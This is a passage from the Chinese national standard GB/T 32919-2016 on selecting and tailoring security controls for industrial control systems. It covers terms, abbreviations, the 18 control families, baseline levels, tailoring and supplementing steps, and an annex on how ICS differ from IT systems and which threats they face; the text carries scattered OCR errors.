采用可编程存储器,通过数字运算操作对工业生产装备进行控制的电子设备。PLC 主要执行各类 运算、顺序控制、定时执行等指令,用于控制工业生产装备的动作,是工业控制系统的主要基础单元。 3.5 安全控制 security control 应用于工业控制系统的管理、运行和技术上的防护措施和对策,以保护工业控制系统及其信息的保 密性、完整性和可用性等。 3.6 安全程序 security program 在工业控制系统的安全建设中,为满足组织安全需求和安全目的,适当采选的一组有序的安余控 制集。 3.7 安全控制族 security control family 本标准将相关主题的安全控制作为一个安全控制族,所有的安全控制分成18个安全控制族,即:规 划(PL) 、安全评估与授权(CA) 、风险评估(RA) 、系统与服务获取(SA) 、程序管理(PM) 、人员安全 (PS)、物理与环境安全(PE)、应急计划(CP)、配置管理(CM)、维护(MA)、系统与信息完整性(SI)、介质 保护(MP)、事件响应(IR)、教育培训(AT)、标识与鉴别(IA) 、访问控制(AC)、审计与问责(AU) 、系统 与通信保护(SC)。 3.8 安全控制基线 security control baseline 安全控制基线是安全控制选择过程的起始点,是为帮助组织选择满足安全需求的、最具成本效益 的、适当的安全控制集而制定的最低安全基准线。 4 缩略语 下列缩略语适用于本文件。 ICS 工业控制系统(Industrial Control System) SCADA 监控和数据采集系统(Supervisory Control and Data Acquisition) DCS 分布式控制系统(Distributed Control System) PCS 过程控制系统(Process Control System) PLC 可编程逻辑控制器(Programmable Logic Controller) RTU 远程终端单元(Remote Terminal Unit) IED 智能电子设备(Intelligent Electronic Device) DRP 灾难恢复计划(Disaster Recovery Planning) ACL 访问控制列表(Access Control List) DNS 域名系统(Domain Name System) DHCP 动态主机配置协议(Dynamic Host Configuration Protocol) DNP 分布式网络协议(Distributed Network Protocol) RPC 远程过程调用协议(Remote Procedure Call Protocol) DCOM 分布式组件对象模式(Microsoft Distributed Component Object Model) OPC 用于过程控制的对象连接与嵌入(Object Linking and Embedding for Process Control) PAD 个人数字助手,乂称掌上电脑(Personal Digital Assistant) DoS 拒绝服务(Denial of Service) CVE 通用漏洞列表(Common Vulncrabilities and Exposures) OVAL 脆弱性评估语言(Open Vulnerability Assessment Language) EAL 评估保证级(Evaluation Assurancc Level) PKI 公钥基础设施(Public Kcy Infrastructure) AC 访问控制(Access Control) AT 教育培训(Awareness and Training) AU 审计与问责(Audit and Accountability) CA 安全评估与授权(Security Assessment and Authorization) CM 配置管理(Configuration Management) CP 应急计划(Contingency Planning) IA 标识与鉴别(Identification and Authentication) IR 事件响应(Incident Response) MP 介质保护(Media Protection) PE 物理与环境安全(Physical and Environmental Protection) PL 规划(Planning) PM 程序管理(Program Management) PS 人员安全(Personnel Security) RA 风险评估(Risk Assessment) SA 系统与服务获取(System and Services Acquisition) SC 系统与通信保护(System and Communications Protection) SI 系统与信息完整性(System and Information Intcgrity) 5 安全控制概述 从概念上来说,工业控制系统的安全与其他领域的安全是一样的 应用于工业控制系统中管 理、运行和技术上的保护措施和对策,以保护工业控制系统及其信息的保密性、完整性和可用性等。应 用这些控制的目的是,减少脆弱性或影响,抵御工业控制系统所面临的安全威胁,从而缓解工业控制系 统的安全风险,以满足利益相关者的安全需要。 为了有效地表达工业控制系统中管理、运行和技术上的措施和对策,应给出该措施对应的动作、输 入/输出及其对应的前置条件和后置条件,特别是给出该控制的效果。例如:关于审计处理失效响应的 控制: 控制: 工业控制系统: a) 对于审计处理失效的事件,向【赋值:组织定义的人员】报警; b) 采取【选择:组织定义的动作,例如:停止系统的运行,重写原有的审计记录,停止生成新的 审计记录等】。 其中的“报警”和“采取组织定义的动作”,就是该控制对应的动作;而“审计处理失效的事件”就是该 控制的…个输入;“向组织定义的人员(报警)”就是该控制的一个后置条件。并且,通过补充指导,强调 了该措施和对策的其他要素,例如:补充指导: a) 审计处理失效包括软硬件错误、审计获取机制失败、审计存储空间达到或超出极限等; b) 组织可针对不同审计处理失效(例如,由于类型、位置、严重程度或这些因素的组合),选择 定义附加的措施; c) 该控制应用于每个审计数据存储库(即存储审计记录的 ICS 部件),应用于组织的整个审计 存储能力(即组合了所有审计数据存储库); d) 在 ICS 不支持审计的情况下,包括对审计失效的响应,组织应按裁剪指导,使用合适的补偿 控制(例如,在隔离的信息系统上提供审计能力)。 e) 相关安全控制:AU-4、SI-12。 如果有必要强调一个控制在深度上的能力,以支持更可靠的保护,可通过控制增强来表达,例如:就 上述的控制而言,其控制增强可表达为:控制增强: a) 对审计处理失效|审计存储能力的响应 在【赋值:组织定义的时间段】内,当分配给审计记录的存储量达到【赋值:组织定义的最大审计记 录存储容量】的某一百分比时,ICS 向【赋值:组织定义的人员、角色或岗位】提供一个警示。 b) 对审计处理失效|实时报警的响应 当【赋值:组织定义的、要求实时报警的审计失效事件】发生时,ICS 在【赋值:组织定义的实时报 警时间段】内,向【赋值:组织定义的人员,角色和岗位】发出报警。 c) 对审计处理失效|可配置的流量阈值的响应 ICS 执行可配置的流量阈值,反映对审计能力的限制,并【选择:拒绝、延迟】网络流量超出这些 阈值。 d) 对审计处理失效|失效宕机的响应 当【赋值:组织定义的审计事件】发生时,ICS 调用【选择:完全宕掉系统,部分宕掉系统;降低运行 模式,仅具有有限可用的业务处理能力】,除非存在一种可选的审计能力。 因此,为了更方便地使用控制选择和规约过程,把控制概括为十八个族。每个族包含一些与该族的 安全功能相关的安全控制。为每个控制族赋予了唯一的由两个字符组成的标识符,并对族中的每个安 全控制,采用了如下基木的描述结构: 族标识符-编号(XX-NN):控制节,补充指导节,控制增强节 其中: 控制节为保护组织或工业控制系统的某个特殊方面,提供了所需要的特定安全能力的简洁陈述,描 述了要由组织或工业控制系统进行的与安全相关的活动或动作。对于某些控制,通过允许组织选择性 地定义与该控制相关参数的输人值,如使用控制中的“赋值”和“选择”操作,实现·定程度的灵活性。 补充指导节提供了一些与特定安全控制相关的信息,指导组织在定义、开发和实现安全控制时适当 地使用。在一些情况中,补充指导提供了在组织运行环境、特定业务需求或风险评估中关切的安全需 求,或一些重要的注意事项,以及实现安全控制所需要的灵活性等细节。 控制增强节为: a) 对基本的控制构造附加的、相关的安全能力 b) 增强基本控制的安全能力。 提供了相应的陈述。控制增强用于需要更大保护的工业控制系统。 通过控制节、补充指导节和控制增强节所描述的控制,使给出的每一控制可有效地表达工业控制系 统的安全需求。 本标准给出的三大安全控制类(管理类、运行类和技术类),十八个安全控制族和族标识符的对照关系: 族标识符 安全控制族 安全控制类 AC 访问控制(Acccss Control) 技术 AT 教育培训(Awareness and Training) 运行 AU 审计与问责(Audit and Accountability) 技术 CA 安全评估与授权(Sccurity Assessment and Authorization) 管理 CM 配置管理(Configuration Managemcnt 运行 MA 维护(Maintenance) 运行 CP 应急计划(Contingency Planning) 运行 IA 标识与鉴别(Identification and Authentication 技术 IR 事件响应(Incident Response) 运行 MP 介质保护(Media Protection) 运行 PE 物理与环境安全(Physical and Environmental Protection) 运行 PL 规划(Planning) 管理 PM 程序管理(Program Management) 管理 PS 人员安全(Personnel Sccurity 运行 RA 风险评估(Risk Asscssment) 管理 SA 系统与服务获取(System and Services Acquisition) 管理 SC 系统与通信保护(System and Communications Protection 技术 SI 系统与信息完整性(System and Information Integrity 运行 6 安全控制基线及其设计 为了给出工业控制系统概念层面上的一种安全解决方案,即构造工业控制系统的安全程序,本标准 结合工业控制系统基本特征(参见附录 A), 结合以往诸多工业控制系统的安全实践,将附录 B 中工业 控制系统的安全控制集分为三个级别,统称为安全控制基线,即基于工业控制系统安全风险的影响程度 对安全控制的一个分级,可作为规划工业控制系统中选择安全控制的一个起始点。 在设计安全控制基线中,基于了以下基本假设: a) 工业控制系统处于物理设施内; b) 工业控制系统中的用户数据和信息是相对长久的; c) 工业控制系统是多用户运行的; d) 工业控制系统中的用户数据和信息必须限制已授权用户的共享; e) 工业控制系统处于网络化环境中; f) 工业控制系统自然具有一些特殊目的; g) 组织具有必要的架构、资源和基础设施,来实现所选基线中的控制。 基线设计的这些基本假设,影响着工业控制系统安全控制的选择,还能响着工业控制系统安全控制 的评估、监视和改进。如果一个或多个前提假设是无效的,那么附录C 中所分配给该基线的一些安全 控制就可能是不适用的,针对这种情况可通过应用后续章节所述的裁剪过程以及风险评估予以处理。 相应地, 一些可能的情况未包含在假设内,例如: a) 组织内存在的内部人员攻击; b) 工业控制系统处理、存储或传输的保密数据和信息; c) 组织内存在高级持续性攻击(APT); d) 基于法律、法规、规章、制度等特殊要求的特殊保护; e) 工业控制系统需要与其他系统进行跨安全域间通信。 如果任何以上情况出现,就可能需要在附录 B 中选择一些附加的安全控制和控制增强,以确保准 确的保护;以上情况也可通过应用后续章节所述的裁剪过程(特别是安全控制补充)和风险评估的结果, 予以有效地处理。 本标准设计的安全控制基线(具体见附录 C),可应用于以下两种情况: 第一种情况,基于工业控制系统的安全风险评估,按风险影响程度将工业控制系统划分为低影响系 统、中影响系统和高影响系统。在这种情况下,低影响系统选择第一级安全控制基线;中影响系统选择 第二级安全控制基线;高影响系统选择第三级安全控制基线。 第二种情况,通过定级划分准则,见 GB/T 22240—2008,已将工业控制系统划分为相应的安全等 级。在这种情况下,1级、2级系统选择第一级安全控制基线;3级系统选择第二级安全控制基线;4级、5 级系统选择第三级安全控制基线。 7 安全控制选择与规约 7.1 选择与规约概述 工业控制系统安全是一项系统工程,单一 的产品和技术不能有效地保护工业控制系统安全,组织应 在充分挖掘工业控制系统安全需求的基础上,制定满足组织使命和业务功能需求的工业控制系统安全 战略。有效的工业控制系统安全战略,应采用深度防御及层次化的安全机制,使任一安全机制失效的影 响最小化。工业控制系统安全应在组织工业控制系统安全战略指导下,通过适当组合配置的安全控制 予以实现。 组织在充分考虑工业控制系统的特殊性、安全需求和工业控制系统与传统信息系统间的差异性(参 考 附 录 A, 或参阅其他相关文献资料)的基础上,通过风险评估梳理工业控制系统及相关资产,针对工业 控制系统存在的脆弱性,分析工业控制系统面临的威胁和风险,评估风险发生的可能性以及风险发生可 能造成的影响和危害,制定风险处置原则和处置计划,将工业控制系统安全风险控制在可接受的水平。 本 标 准 附 录C 中给出的安全控制基线,仅是为了工业控制系统的安全需求规约,作为进行安全控 制选择与规约的起始点。因此,为了使组织的工业控制系统是安全的,就必须实施选择并规约安全控制 和控制增强的过程,该过程包括以下三个子过程: a) 选择初始安全控制基线; b) 裁剪所选择的初始安全控制基线; c) 补充经裁剪的安全控制基线。 7.2 安全控制选择 选择基线安全控制是选择并规约安全控制的第 一 步,组织依据工业控制系统信息安全定级或工业 控制系统风险评估结果,根据安全控制基线的应用指导(参见第6章),从附录C 中 三 个 安 全 控 制 基 线 中选择 一 个合适的基线控制集。选择基线安全控制集时应注意第6章所描述的前提假设。 GB/T 32919—2016 7.3 安全控制裁剪 7.3.1 裁剪过程 在从附录C 中选择基线安全控制的初始集后,组织开始基线安全控制的裁剪过程。裁剪过程包括 以下3个活动: a) 依据所选择的基线安全控制,应用界定范围的指导,获得初步可用的控制集; b) 需要时选择补偿安全控制,以调整初步可用的控制集,获得更可实现的控制集; c) 通过显式的赋值陈述和选择陈述,规约安全控制中的参数,完成所选基线的定义。 7.3.2 界定范围的指导 界定范围的指导,就所选安全控制基线中每个安全控制的适用性和实现,为组织提供了特定的条款 和条件。 应用界定范围的指导,是基于工业控制系统所支持的业务功能和系统运行环境,从初始安全控制基 线中删除一些不必要或不适用的安全控制,有助于确保组织仅选择那些可为工业控制系统提供合适程 度保护所需要的控制。下面给出一些界定范围的考量,它们可潜在地影响如何应用所选的安全控制基 线以及如何实现安全控制。 a) 与控制和应用范围有关的考量 工业控制系统概念是个多层次抽象概念,既包括多个系统组成的复杂系统,又包括单个板卡组成的 简单系统。越来越复杂的工业控制系统需要仔细分析在风险管理不同等级(组织级、业务流程级和系统 级)中的安全控制的分配和应用。初始安全控制基线中的控制适用于工业控制系统层面,但未必适用于 系统组件层面。基线中的一些控制,对工业控制系统范围内的每个系统部件,给出了并非必要的一些控 制。 一些安全控制仅适用于工业控制系统部件,提供或支持由该控制所强调的安全能力,并缓解潜在的 风险。例如,通常把审计控制作为工业控制系统的一个部件,以提供审计能力,并不适用于组织内每个 用户层的工作站;或当工业控制系统的部件是单一用户的、无网络连接或是物理隔离网络的一部分时, 这些特征可为不把所选择的控制应用到那些部件中提供合适的理由。组织应评估工业控制系统部件清 单,以确定安全控制是否适用于各种不同的部件,而后就如何应用控制做出明确的决策,以满足组织的 安全需求, b) 与安全目的有关的考量 基线中的一些控制仅独特地支持保密性、完整性或可用性的安全目的,对此可把它们降级为低基线 中对应的控制(或如果在低基线中没有给出定义的话,予以删除或修改)。该降级、修改或删除的动作当 且仅当以下情况成立才进行: 1) 安全控制所完成的安全目的可以由组织风险评估所支持; 2) 不会对工业控制系统相关安全保护水平造成不利影响。 例如, 一个工业控制系统被评估为中等影响,其可用性和完整性为中等影响,其保密性为低等影响, 那些仅与保密性相关的安全控制在不影响安全性目标的前提下可以降低到低级别的基线要求。以下安 全控制可作为降级的候选控制: 1) 与保密性相关的安全控制包括:AC-18、MA-3c)、MP-3、MP-4、MP-5、MP-5d)、MP-6、PE-4、 PE-5、SC-4、SC-9、SC-9a)等; 2) 与完整性相关的安全控制包括:CM-5、CM-5a)、CP.8a)、SC-8、SC-8a)、SI-7、SI-7a)、SI-7d)、SI- 8等; 3) 与可用性相关的安全控制包括:CP-2a)、CP-2b)、CP-2c)、CP-2d)、CP-2e)、CP-2f)、CP-3a)、CP- Aa) 、CP-4b) 、CP-6 、CP-6a) 、CP-6b) 、CP-6c) 、CP-7 、CP-7a) 、CP-7b) 、CP-7c) 、CP-8 、CP-8b) 、CP-8c) 、CP-8d) 、CP-8e) 、CP-8f) 、CP-9a) 、CP-9b) 、CP-9c) 、CP-9d) 、MA-6 、PE-9 、PE-10 、PE-11、 PE-12、PE-13、PE-14、PE-16 等。 c) 与技术有关的考量 安全控制涉及了一些特定的技术(如:无线、加密、PKI 等),这样的控制仅当在工业控制系统内使用 时或需要时,它们才是适用的。 一些控制可通过自动化机制予以支持,如果这样的机制不存在,或市场 上或政府采购产品目录中现在没有或还不能应用时,并不要求开发这样的机制。例如,为了维护最新 的、完备的、精确的、现时可用的工业控制系统基线配置,可能使用一些自动化机制。如果自动化机制不 是现时可用的、合算的或技术上不是可行的,就需要使用一些补偿的安全控制,通过非自动化机制或规 程予以实现的,以便满足所规约的安全控制的需求(参见补偿安全控制相关章节)。 d) 与物理基础设施有关的考量 基线中的一些控制涉及了组织物理基础设施(例如,物理控制,诸如上锁和门禁;有关温度、湿度、照 明、防火以及电力等),仅适用于那些存放设施的地方,直接为工业控制系统(包括诸如场站等信息技术 资产)提供保护和支持,或直接与工业控制系统有关。 e) 与策略和规章有关的考量 基线中的一些控制强调了某些法律、法规、方针、政策、标准等要求,仅当这些控制的应用环境与相 关法律、法规、方针、政策、标准一致时才需要。 f) 与运行环境有关的考量 基线中的一些安全控制依赖于运行环境,仅当在环境中使用该工业控制系统时才适用。例如, 一些 物理安全控制不适用于那些基于空间的系统, 一些温度和湿度的控制不适用于室内设施之外的远程传 感器。 g) 与共用控制相关的考量 共用控制是指那些可以被组织内多个工业控制系统继承使用的安全控制。如果一个工业控制系统 继承了共用控制,那么其安全性能是由另…个实体提供的,该系统就不需要显式地实现该控制。共用安 全控制的标识与定义会影响组织的整体资源支出。将安全控制指定为共用安全控制的决策可能会极大 地影响单个工业控制系统安全控制基线的组成。 7.3.3 安全控制补偿 补偿安全控制是由组织选择使用的、用于替代所选安全控制基线中一些特定的安全控制,为工业控 制系统所处理、存储或传输的信息提供等价的或可比的保护。 当组织无法有效地实现初始安全控制基线中具体的安全控制时,或者当组织工业控制系统和运行 环境存在特殊性时,或者当初始安全控制基线中具体的安全控制不能高效地实现风险减少或缓解时,也 就是基线中的控制不是一种合算的措施或对策时,组织可以选取补偿安全控制。并为每个补偿安全控 制在工业控制系统安全计划中详细描述选取的原因,以及补偿安全控制如何提供等价保护的说明。 通常,在应用界定范围的考量后,组织就可能发现有必要选择并使用补偿安全控制。组织应如此使 用补偿安全控制: 首先,要从附录B 中来选择补偿控制,其中如果没有合适可用的补偿控制,组织才可采用其他源中 合适的补偿控制; 其次,组织为补偿控制如何为工业控制系统提供等价的安全能力以及为什么不能使用该基线安全 控制,给出支持理由; 最后,组织评价并接受在工业控制系统中使用补偿安全控制所带来的相关风险。 7.3.4 安全控制参数赋值 安全控制基线中的部分安全控制和控制增强包含嵌入参数(例如:赋值和选择陈述),例如,审计失效响 应(AU-5): 审计失效响应(AU-5) 控制: 工业控制系统: a) 对于审计处理失效的事件,向【赋值:组织定义的人员】报警; b) 采取【赋值:组织定义的动作,例如:停止系统的运行,重写原有的审计记录,停止生成新的 审计记录等】。 安全控制参数为组织定义控制和控制增强的 一 定部分提供了灵活性,以便支持特定组织的需求。 在应用界定范围考量后,组织应评审带有赋值和选择陈述的安全控制和控制增强,并为所标识的参 数确定组织定义的值。参数值可根据相关法律、法规、规章、制度、政策或标准予以规定。 一 旦组织为安全控制和控制增强定义了参数值,那么这些定义的赋值和选择就成为安全控制和控 制增强的有机部分。 通常,组织应在选择补偿控制前,规约安全控制参数值,因为安全控制参数的规约完成了安全控制 的定义,可能会影响补偿控制的需求。 对于以上章节所述裁剪过程的实施,应当注意以下事项: a) 在实施初始安全控制基线的裁剪过程前,应与组织相关领导协商裁剪活动,并得到批准。 b) 组织不能随意为运行方便而移出安全控制。安全控制的裁剪决策应基于业务需要,是可论证 的,并是伴同明确的、基于风险的评估决定。 c) 裁剪决策,包括决策理由,以及裁剪出的安全控制及其理由,均要记录在组织工业控制系统安 全计划中,并作为安全计划批准过程的一部分,得到负责领导的审批。 7.4 安全控制补充 裁剪后的安全控制基线,仅确定 一 个工业控制系统所需要的安全控制集的基础或起始点。只有在 组织风险评估的指导下才能最后确定合适的安全控制集。在控制选择过程中的风险评估,为确定裁剪 后的基线安全控制的充分性,提供了重要的输人。在许多情况中,为强调特定的威胁和脆弱性,为满足 法律、法规、方针、政策、标准和规章制度等要求,需要补充一些附加的安全控制和控制增强。组织应最大化地使用附录 B 中所给出的安全控制,以支持补充和增强安全控制过程,向经裁剪的安全控制基线 中增加安全控制和控制增强。 为了补充已裁剪的安全控制基线,组织可使用需求定义法或空隙分析法选择安全控制和控制增强。 在需求定义法中,组织获得有关敌对方活动的特定、可靠的威胁信息(或做出一种有根据的假设),以及 一定能力或攻击的潜能(例如技能水平、经验、可用的资源等)。为了有效地抵御具有所陈述能力和潜能 敌对方的攻击,组织应从附录 B 选择一些附加的安全控制和控制增强,以获得这样的安全能力。 相对于需求定义法,空隙分析法以组织当前安全能力的评估开始,基于初始的安全能力评估,组织 确定可预见的威胁类型。如果组织当前的安全能力是不充分的,那么通过空隙分析就可确定所需要的 安全能力。然后,组织从附录 B 中选择一些所需要的安全控制和控制增强,以达到期望的安全能力。 存在一些情况,为了充分保护组织使命和业务功能,纽织使用了一些超出其能力的信息技术,即组 织在工业控制系统中不能应用充分的安全控制来精确地减少或缓解风险。在这些情况中,就需要一种 可选的安全战略,来预防组织使命和业务功能遭受负面影响。当安全控制在技术、资源约束下不能实现 时或当控制缺乏期望的有效性来抵御已标识的风险时,应限制技术应用或限制工业控制系统的使用,来 减少或缓解风险。可使用的限制包括: a) 限制工业控制系统可处理、存储或转送的信息; b) 限制组织使命和业务功能的自动化方式; c) 禁止移动工业控制系统或系统部件; d) 禁止外部网络访问组织工业控制系统; e) 禁止工业控制系统部件里中、高影响的访问。 7.5 建立安全控制决策文档 由于安全控制的描述相对精炼、抽象,可能缺乏实现安全控制的足够信息。组织应在工业控制系统 安全计划中详细描述安全控制的实现目的、实现细节、适用范围以及安全控制与安全需求间的切合度等 安全控制实现相关的规范信息。但在描述安全控制的规范信息时,不能更改安全控制的原始意图。 在安全控制选择过程期问,组织应建立所有安全控制的决策文档,为这些决策提供有力的理由。当 存在对组织使命和业务功能的潜在影响,或在检查工业控制系统整个安全考量时,或当工业控制系统进 行重大变更时,或当定期审核工业控制系统安全时,该文档均是基本的支撑资料。最终选择安全控制集及其选择过程的支持理由,以及任何工业控制系统的使用限制,均应记录在该工业控制系统安全计划 8 安全控制选择过程应用 安全控制选择过程可从两个不同的角度,应用于组织的工业控制系统。 一个角度是新系统的开发, 另 一个角度是在运行系统。对于新开发系统,由于系统并不存在,并且组织没有进行初始的安全定级, 因此要从需求定义的视角来应用安全控制选择过程。包含在工业控制系统安全计划中的安全控制,作 为组织的安全规格说明,应用在设计、开发、实现、运行等系统生命周期各阶段。 对于在运行系统,当系统发生重大变更时,要用空隙分析法来应用安全控制选择过程。由于系统已 经存在,组织已完成了安全定级和安全控制选择过程,其结果已在系统安全计划中,并在系统中予以实 现。因此,可以用以下方式应用空隙分析: 首先,基于当前系统处理、存储和传输的不同业务类型,重新评估、确认系统安全级别,必要时调整 系统安全级别。 其次,重新评审现有安全计划,以确保系统风险保持在可接受的水平,分析当前使用的、相关联的安 全控制与安全需求间的切合程度,记录需增加的安全控制,整理并调整到安全计划中。必要时重新实施 风险评估,重新制定安全计划。 最后,实现经调整的或重新制定的安全计划中的安全控制,在措施和里程碑计划中记录任何没有实 现的安全控制,并与新开发系统相同的方式继续其余步骤。 工业控制系统面临的安全风险 A.1 工业控制系统与传统信息系统对比 大多数的工业控制系统均在网络、个人计算机和互联网普及以前开发并使用,设计之初主要用于解 决高效、稳定、可靠、安全等需求。通常情况下,它们与外部网络物理隔离,并且运行在专有的、具有基本 错误检测和处理能力的软、硬件平台和通信协议上,缺乏面对当前互联网时代所需要的安全通信能力。 虽然这些系统设计时关注了可靠性、可用性和可维护性,但没有预料到在解决性能和故障统计等需求时 需要面对的信息安全问题。在当时,工业控制系统安全仅意味着物理上专有网络访问和系统控制台 功能。 工业控制系统在20世纪80年代和90年代与微处理器、个人计算机和网络技术同步发展,在90年 代后期,互联网技术开始融入到工业控制系统的设计中。这些新技术带来的变化使工业控制系统面临 的新威胁,并增加了工业控制系统受到损害的可能性。 最初,工业控制系统使用专门的硬件和软件系统,类似于独立运行的专用控制协议。随着低成本的 互联网协议设备正在取代专有设备的解决方案产生,网络安全漏洞和安全事件发生的可能性不断增加。 随着T 业控制系统开始采用 IT 解决方案来促进企业连接和远程访问等功能,设计并使用标准计算机、 操作系统和网络协议,工业控制系统越来越像 IT 系统。这些支持新的 IT 功能技术的集成,工业控制 系统与之前相比减少了封闭性,也产生了新的安全需求。虽然传统 IT 系统已具备解决这些安全问题 的解决方案,但在工业控制系统中引入这些解决方案必须考虑工业控制系统的特殊性。在某些情况下 需要针对工业控制系统的特殊性裁剪这些安全解决方案。 工业控制系统与传统 IT 系统相比存在许多特殊性,包括不同的风险和优先级,不同的性能和可靠 性要求等。下面列出了解决工业控制系统安全需要考虑的特殊性: a) 性能需求 工业控制系统通常是严格按照时序要求的,可接受的延时和抖动标准与具体系统相关,系统需要确 定的响应,高处理能力通常不是必须的。而传统 IT 系统需要高处理能力,而能够接受一定的延时和 抖动。 b) 可用性需求 很多工业控制系统具有工作连续性,意外的中断往往是不可接受的。中断是按计划进行的,并提前 数日或数周完成规划安排。详尽的部署测试是必不可少的,以确保高工业控制系统的高可用性。在某 些情况下,工业控制系统所生产的产品或所使用的设备比系统处理或传递的信息更重要。因此,工业控 制系统对高可用性、可靠性和可维护性要求,使用典型的 IT 策略,如重新启动组件,通常是不可接受的 解决方案。部分工业控制系统采用冗余组件,并保持并联运行,以保证在主组件异常或不可用时保证系 统运行的连续性。 c) 风险管理需求 在典型的 IT 系统中,数据机密性和完整性通常是首要关注问题。而工业控制系统首要关注问题 是防止危害生命、公众健康或信心,监管合规,防止设备、产品或知识产权的损失等。 d) 安全焦点 在典型的 IT 系统中,安全焦点是保障 IT 资产的正常运行,并保护这些资产中处理、存储或传输的 信息。在某些体系架构中,存储和处理的信息更为关键,并得到更多的保护。对于工业控制系统,边缘 GB/T 32919—2016 设备(如 PLC、操作员站、DCS 等)直接负责控制过程而需要仔细保护。由于可能对每个边缘设备产生 不利影响,对工业控制系统中央服务器的保护也非常重要。 e) 物理交互 典型的 IT 系统往往与环境没有物理上的相互作用。而工业控制系统可能与物理环境间有非常复 杂的相互作用。因此,集成到工业控制系统中任何安全功能必须进行严格测试,以确保安全功能不会影 响工业控制系统的正常功能。 f) 时间确定性响应 在典型的IT 系统中,实现访问控制时不必过多关心数据流的情况。而在工业控制系统中,系统自动 响应时间或者系统对人类交互的响应是非常关键的,如:在 HMI 中的身份验证和授权不得妨碍或下扰工 业控制系统的紧急措施,信息流不能中断。因此,工业控制系统安全控制的运用应受到严格的的限制。 g) 系统运行 工业控制系统的操作系统和应用程序可能无法容忍典型 IT 系统的安全实践。控制网络往往比较 复杂,需要不同的专业知识(例如,控制网络通常由控制工程师管理,而非 IT 人员)。在运行的控制网 络中,软件和硬件的升级更困难。许多系统可能不具有必要的功能,包括加密功能、错误日志记录和密 码保护等IT 系统中最基本的功能。 h) 资源约束 工业控制系统和它们的实时操作系统往往是资源受限的系统,通常不包括典型IT 系统的安全能 力。在工业控制系统组件上可能没有可用的计算资源来改造现有的安全功能。此外,在某些情况下,因 为T.业控制系统供应商许可证和服务协议,第三方安全解决方案是不允许的。 i) 通信 用于工业控制系统现场控制和处理器间通信的通信协议是专有的,与典型的 IT 系统通信协议完 全不同。 j) 变更管理 无论是IT 系统还是工业控制系统,变更管理都是保证完整性的重要措施。未安装补丁的软件是 一个巨大的安全漏洞。通常采用适当的安全策略和程序及时进行 IT 系统软件的更新,包括安全补丁 更新。此外,这些更新通常使用基于服务器的工具来自动实现。因为更新需要进行全面的测试和计划, 工业控制系统的更新往往不及时。另外,由于工业控制系统通常使用旧版的操作系统,供应商已停止技 术支持,因此,更新程序往往不适用于工业控制系统。因此,工业控制系统的变更(包括硬件、固件和软 件的变更)过程需要经过工业控制系统专家、信息安全专家和信息系统专家的仔细评估。 k) 服务支持 典型的 IT 系统允许多样化的支持方式。而对于工业控制系统,服务支持通常来白于单一供应商, 可能不存在多样化的支持方式。 I) 组件生命周期 由于技术的快速演变,典型的 IT 组件只有3年~5年的生命周期。而工业控制系统组件的生命周 期往往有15年~20年,甚至更长。 m) 组件访问 典型的IT 系统组件通常是本地的和易于访问的,而工业控制系统组件可能是分离的、远程的,对 它们的访问需要大量的外部尝试。 A.2 信息系统安全威胁与防护措施对工业控制系统的影响 工业控制系统运行引发出许多与大多数IT 系统不同的安全挑战。例如大多数安全措施是为对付 因特网上黑客制定的。因特网环境与工业控制系统运行环境是极其不同的。所以在安全行业中对安全需求以及安全措施可能影响工业控制系统运行的特殊要求,通常是缺乏认识的。 a) 拒绝服务的影响 已经制定的安全服务和技术主要是为了并不具有许多严格性能和可靠性要求的行业,而这些恰恰 是工业控制系统运行所需要的。例如:与授权客户不能访问其银行账户相比,使授权调度员无法访问工 业控制系统远端站场控制有可能造成更为严重的后果。所以拒绝服务的威胁远比许多典型因特网交易 更为巨大。 b) 加密传输 使用工业控制系统的行业中使用的许多通信信道是窄带的而且端设备经常受到内存和计算机能力 的限制,从而由于某些安全措施所需的开销而不允许采用,如加密和密钥交换。 c) 密钥管理 大多数系统和设备是位于地域广大而分散、无人的远方场所,且根本没接入到因特网。这使得密钥 管理、证书撤消和其他一些安全措施难于实现。 d) 公网联接 许多系统都由公共线路通信通道连接(条件所限无专网),由于协议不兼容,所以工业通用的网络安 全措施(协议)不能工作。 e) 无线通信的影响 虽然无线通信正广泛为许多应用所使用,但工业控制系统使用这些无线技术的场所和所实现的功 能,有较多限制;部分是因为远端站场恶劣的电磁环境对可用性的潜在影响(如变电站的高电噪声环 境);部分是因为一些应用要求非常快速且极其可靠的响应(吞吐量),即使许多无线技术具有相应的安 全措施,也可能因为增加系统开销而未实现。 A.3 工业控制系统面临的威胁 随着工业控制系统网络化、系统化、自动化、集成化的不断提高.其面临的安全威胁日益增长。从发 生的典型事件看,针对工业控制系统的安全威胁主要来自五个方面: a) 自然环境因素; b) 人为错误或疏忽大意; c) 设备故障; d) 病毒等恶意软件; c) 敌对威胁,如黑客、僵尸网络的操控者、犯罪组织、国外情报机构、恶意软件的作者、恐怖分子、 工业间谋、内部攻击者等。 表 A.1 详细列出了T.业控制系统可能面临的威胁。 表 A.1 工业控制系统可能面临的威胁 威胁源 描述 内部攻击者 具有攻击性的内部员工是计算机犯罪的主要来源之一。内部攻击者了解目标系统,往往被允 许不受限制的访问系统,所以并不需要掌握太多关于计算机入侵的知识,就可以破坏系统或 窃取系统数据。内部人员威胁也包括外购产品的供应商 黑客 黑客人侵往往是为了获得刺激和成就感。大多数这类攻击者本来不具备专业攻击技术,现在 却可以从互联网上下载攻击脚本和程序,向目标发起攻击;而且攻击工具越来越高级和吏容 易使用。并且黑客的数量庞大,分布在全球,即使是独立或短暂的攻击破坏,也会导致严重的 后果,总体上形成了柑对较高的安全威胁 僵尸网络的操控者 僵尸网络的操控者通过操纵大量系统进行协同攻击、散布钓鱼网、垃圾邮件和恶意软件。有 时候他们利用这些受控制的系统和网络,在黑市上将拒绝服务攻击、垃圾邮件攻击或者网络 钓鱼攻击等进行买卖交易 恶意软件的作者 居心不良的个人或组织通过制造并传播恶意软件对用户实施攻击。 一些破坏性的恶意软件 会损害系统文件或硬件驱动器、控制关键过程、开启执行程序以及控制系统所控制的设备等 恐怖分子 恐怖分子试图破坏、致瘫或利用关键基础设施来威胁国家安全,引起大规模人员伤亡,削弱国 家经济,降低民众的士气与信心。恐怖分子可能利用钓鱼网站和恶意软件来获取资金或搜集 敏感倍息,也可能会佯攻·个目标以转移对其他目标的关注程度和保护力度 业 间 谍 工业间谋通过暗中活动的方式企图获取有情报价值的资产和技术秘密 犯罪组织 犯罪组织一般为了获取钱财攻击系统,他们往往利用垃圾邮件、网络钓鱼、恶意软件来实施身 份盗窃和网上欺诈行为。国际间谍组织和犯罪组织也会进行工业间谋活动,大规模的盗窃金 钱,雇用或培养黑客人才,从而对国家安全造成威胁 境外国家力量 